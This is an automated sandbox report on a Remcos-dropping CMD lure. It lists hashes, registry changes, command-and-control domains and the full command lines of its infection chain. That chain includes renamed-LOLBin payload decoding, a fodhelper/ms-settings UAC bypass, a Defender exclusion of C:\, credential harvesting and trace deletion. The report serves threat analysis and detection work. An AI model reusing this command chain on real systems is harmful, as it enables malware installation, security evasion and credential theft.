Analysis Overview
SHA256
bdab83d4833d93e87768a40e776dbac732b769b1e191217ce17f5aaf0bdc259d
Threat Level: Known bad
The file BOQ_47864594_AL Madheef Project_2024_05_13.zip was found to be: Known bad.
Malicious Activity Summary
Remcos
Nirsoft
NirSoft MailPassView
NirSoft WebBrowserPassView
Loads dropped DLL
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Adds Run key to start application
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
Kills process with taskkill
Suspicious behavior: MapViewOfSection
Modifies registry class
Suspicious behavior: CmdExeWriteProcessMemorySpam
Script User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-13 16:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-13 16:22
Reported
2024-05-13 16:25
Platform
win7-20240508-en
Max time kernel
142s
Max time network
122s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\ger.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Ping_c.pif | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open\command | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open | C:\Users\Public\ger.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | C:\Users\Public\ger.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Libraries\Ping_c.pif | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
Network
Files
\Users\Public\alpha.exe
| MD5 | 5746bd7e255dd6a8afa06f7c42c1ba41 |
| SHA1 | 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8 |
| SHA256 | db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386 |
| SHA512 | 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e |
\Users\Public\kn.exe
| MD5 | ec1fd3050dbc40ec7e87ab99c7ca0b03 |
| SHA1 | ae7fdfc29f4ef31e38ebf381e61b503038b5cb35 |
| SHA256 | 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3 |
| SHA512 | 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2 |
\Users\Public\xkn.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2568-43-0x000000001B560000-0x000000001B842000-memory.dmp
memory/2568-44-0x0000000001E00000-0x0000000001E08000-memory.dmp
C:\Users\Public\ger.exe
| MD5 | 9d0b3066fe3d1fd345e86bc7bcced9e4 |
| SHA1 | e05984a6671fcfecbc465e613d72d42bda35fd90 |
| SHA256 | 4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e |
| SHA512 | d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119 |
C:\Users\Public\Ping_c.mp4
| MD5 | bba7d06647e85df8c8f2d38e662019ab |
| SHA1 | 18f8b97c1dbf34d7f5564a1cf3344003b7ad2f26 |
| SHA256 | 604b7c9f8e98ebc2b14ef486e35304754fd21ecd667f8c2780a0239182371c6e |
| SHA512 | dbf643c716d737e2d73b43b68debcd587c8ffb0354a8035c3af38d8df1868af07c8c5eaaa3e2c8a1d22b6a54528d64ebaf0416ae368a11be16bc13a93f892082 |
C:\Users\Public\Libraries\Ping_c.pif
| MD5 | f0f18b73b40316ee5a0b5bf847261b94 |
| SHA1 | 50ad93aed2b14b696d1e7ce4fbc5e9529522386e |
| SHA256 | d3bf0cabd6ac5c52e6a7dde6b3853d5c6963b839a611ea310a883dfb11e96087 |
| SHA512 | cd01aa45eeb1b34ce024b55f8c9123126c5892595c2ea54d5db6de6d7df8eb085476e0788ad8120d9f9f998d831bf751bdc4e6839736cbb88957302e8c9db813 |
memory/1668-75-0x0000000000400000-0x0000000000517000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-13 16:22
Reported
2024-05-13 16:25
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Remcos
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows \System32\per.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rzpcyblh = "C:\\Users\\Public\\Rzpcyblh.url" | C:\Users\Public\Libraries\Ping_c.pif | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5080 set thread context of 3340 | N/A | C:\Users\Public\Libraries\Ping_c.pif | C:\Users\Public\Libraries\hlbycpzR.pif |
| PID 3340 set thread context of 724 | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | C:\Users\Public\Libraries\hlbycpzR.pif |
| PID 3340 set thread context of 4668 | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | C:\Users\Public\Libraries\hlbycpzR.pif |
| PID 3340 set thread context of 1972 | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | C:\Users\Public\Libraries\hlbycpzR.pif |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open | C:\Users\Public\ger.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | C:\Users\Public\ger.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Windows \System32\per.exe
"C:\\Windows \\System32\\per.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Rzpcyblh.PIF
C:\Users\Public\Libraries\hlbycpzR.pif
C:\Users\Public\Libraries\hlbycpzR.pif
C:\Users\Public\Libraries\hlbycpzR.pif
C:\Users\Public\Libraries\hlbycpzR.pif /stext "C:\Users\Admin\AppData\Local\Temp\xnqchqzrpwfawvtvriacir"
C:\Users\Public\Libraries\hlbycpzR.pif
C:\Users\Public\Libraries\hlbycpzR.pif /stext "C:\Users\Admin\AppData\Local\Temp\ihvuhajtdexfzbpzisndtwvvab"
C:\Users\Public\Libraries\hlbycpzR.pif
C:\Users\Public\Libraries\hlbycpzR.pif /stext "C:\Users\Admin\AppData\Local\Temp\sjbnitunzmpkjqddrdixwjhebpylh"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.66.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | graffae-my.sharepoint.com | udp |
| US | 13.107.136.10:443 | graffae-my.sharepoint.com | tcp |
| US | 13.107.136.10:443 | graffae-my.sharepoint.com | tcp |
| US | 8.8.8.8:53 | tasstrading.com | udp |
| US | 45.42.140.13:443 | tasstrading.com | tcp |
| US | 8.8.8.8:53 | 10.136.107.13.in-addr.arpa | udp |
| US | 45.42.140.13:443 | tasstrading.com | tcp |
| US | 8.8.8.8:53 | pentester0.accesscam.org | udp |
| MY | 103.186.117.159:56796 | pentester0.accesscam.org | tcp |
| US | 8.8.8.8:53 | 13.140.42.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.53.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | archived.zapto.org | udp |
| MY | 103.186.117.159:56797 | archived.zapto.org | tcp |
| US | 8.8.8.8:53 | honeypotresearchteam.duckdns.org | udp |
| MY | 103.186.117.159:13922 | honeypotresearchteam.duckdns.org | tcp |
| US | 8.8.8.8:53 | 159.117.186.103.in-addr.arpa | udp |
| MY | 103.186.117.159:13922 | honeypotresearchteam.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Public\alpha.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\Users\Public\kn.exe
| MD5 | bd8d9943a9b1def98eb83e0fa48796c2 |
| SHA1 | 70e89852f023ab7cde0173eda1208dbb580f1e4f |
| SHA256 | 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2 |
| SHA512 | 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b |
C:\Users\Public\xkn.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1vv2ggzk.03f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1664-41-0x0000016E9C2F0000-0x0000016E9C312000-memory.dmp
C:\Users\Public\ger.exe
| MD5 | 227f63e1d9008b36bdbcc4b397780be4 |
| SHA1 | c0db341defa8ef40c03ed769a9001d600e0f4dae |
| SHA256 | c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d |
| SHA512 | 101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9 |
C:\Users\Public\Ping_c.mp4
| MD5 | bba7d06647e85df8c8f2d38e662019ab |
| SHA1 | 18f8b97c1dbf34d7f5564a1cf3344003b7ad2f26 |
| SHA256 | 604b7c9f8e98ebc2b14ef486e35304754fd21ecd667f8c2780a0239182371c6e |
| SHA512 | dbf643c716d737e2d73b43b68debcd587c8ffb0354a8035c3af38d8df1868af07c8c5eaaa3e2c8a1d22b6a54528d64ebaf0416ae368a11be16bc13a93f892082 |
C:\Windows \System32\per.exe
| MD5 | 85018be1fd913656bc9ff541f017eacd |
| SHA1 | 26d7407931b713e0f0fa8b872feecdb3cf49065a |
| SHA256 | c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5 |
